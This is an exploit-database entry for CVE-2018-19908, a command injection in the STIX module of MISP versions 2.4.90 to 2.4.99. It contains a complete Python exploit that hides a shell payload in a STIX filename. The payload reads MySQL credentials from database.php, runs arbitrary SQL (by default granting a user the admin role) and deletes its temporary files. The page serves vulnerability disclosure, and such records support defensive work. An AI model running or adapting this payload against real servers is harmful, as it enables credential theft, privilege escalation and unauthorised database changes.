SQL command execution via command injection in STIX module

vendor:

MISP

by:

Tm9jdGlz

8.8

CVSS

HIGH

Command Injection

CWE

Product Name: MISP

Affected Version From: 2.4.90

Affected Version To: 2.4.99

Patch Exists: YES

Related CWE: CVE-2018-19908

CPE: a:misp:misp

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: 2.4.97

2019

SQL command execution via command injection in STIX module

A vulnerability in the STIX module of MISP (Malware Information Sharing Platform) allows an attacker to execute arbitrary SQL commands via command injection. This exploit uses a payload as a stix filename, which is then encoded and passed to the vulnerable application. The payload contains a set of commands that are used to extract the database credentials from the database.php file, and then use them to execute the arbitrary SQL command. The exploit also uses python to decode the payload and then execute it.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of MISP.

Source

Exploit-DB raw data:

#-*-coding:utf-8-*-
#
# Exploit Title: SQL command execution via command injection in STIX module
# Date: 2019-17-02
# Exploit Author: Tm9jdGlz
# Vendor Homepage: https://www.misp-project.org/
# Software link: https://www.misp-project.org/download/
# Version: 2.4.90 - 2.4.99
# Tested on: 2.4.97
# CVE: CVE-2018-19908
# 
# Use this payload as stix filename

def encode_data(data):
    from base64 import b64encode
    from urllib.parse import quote_plus

    b64Data = b64encode(data.encode("utf-8"))
    urlEncode = quote_plus(b64Data)

    return urlEncode


def generate_payload(SQLRequest):
    payload = 'MISPPath="../../";'\
            'MISPPDB="$MISPPath/app/Config/database.php";'\
            'MySQLUUser=$(grep -o -P "(?<=\'login\' => \').*(?=\')" $MISPPDB);'\
            'MySQLRUser=${{MySQLRUser:-$MySQLUUser}};'\
            'MySQLUPass=$(grep -o -P "(?<=\'password\' => \').*(?=\')" $MISPPDB);'\
            'MySQLRPass=${{MySQLRPass:-$MySQLUPass}};'\
            'MISPDB=$(grep -o -P "(?<=\'database\' => \').*(?=\')" $MISPPDB);'\
            'mysql -u $MySQLRUser -p$MySQLRPass $MISPDB -e "{}"'
    return payload.format(SQLRequest)

def generate_exploit(SQLRequest, **kwargs):
    options = {
            "inputFile" : kwargs.get("input_file", "data"),
            "outputFile" : kwargs.get("output_file", "data2"),
            "payload" : encode_data(generate_payload(SQLRequest))
    }

    exploit = "; echo '{payload}'>{inputFile};"\
            "python3 -c 'import urllib.parse;"\
            'fd=open(\\"{outputFile}\\",\\"w\\");'\
            'fd.write(urllib.parse.unquote_plus(open(\\"{inputFile}\\").read()));'\
            "fd.close()';"\
            "base64 -d {outputFile}>{inputFile};"\
            "sh {inputFile};"\
            "rm {inputFile} {outputFile} #".format(**options)
    return exploit

def main():
    SQLRequest = "UPDATE users SET role_id=1 WHERE id = 2"
    print(generate_exploit(SQLRequest))

if __name__ == "__main__":
    main()